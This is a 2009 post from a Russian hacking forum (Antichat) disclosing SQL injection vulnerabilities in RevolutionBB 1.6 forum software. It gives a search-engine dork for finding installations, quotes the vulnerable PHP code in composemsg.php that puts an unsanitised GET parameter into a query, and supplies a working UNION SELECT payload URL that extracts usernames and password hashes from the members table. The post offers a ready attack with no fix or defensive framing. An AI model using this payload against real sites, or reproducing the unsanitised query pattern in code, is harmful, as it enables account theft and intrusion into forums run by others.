30.04.2009, 04:51
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Уязвимости RevolutionBB 1.6(возможно и более ранние версии)
download: http://www.revbb.net/releases/revbbv1-6.zip
dork: "RevolutionBB 2008-2009"
SQL-injection(требования: magic_quotes=off)
Инъекции есть буквально в каждом скрипте, приведу всего лишь 1 пример:
уязвимый код:
composemsg.php
PHP код:
$id = $_GET['id'];
$privatem = mysql_query(
"SELECT *
FROM
".PREFIX."pms
WHERE id='$id'"
);
$private = mysql_fetch_array($privatem);
эксплуатирование:
Код:
composemsg.php?id=1'+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10+from+<prefix>_members--+
(с) Iceangel_
|
|
|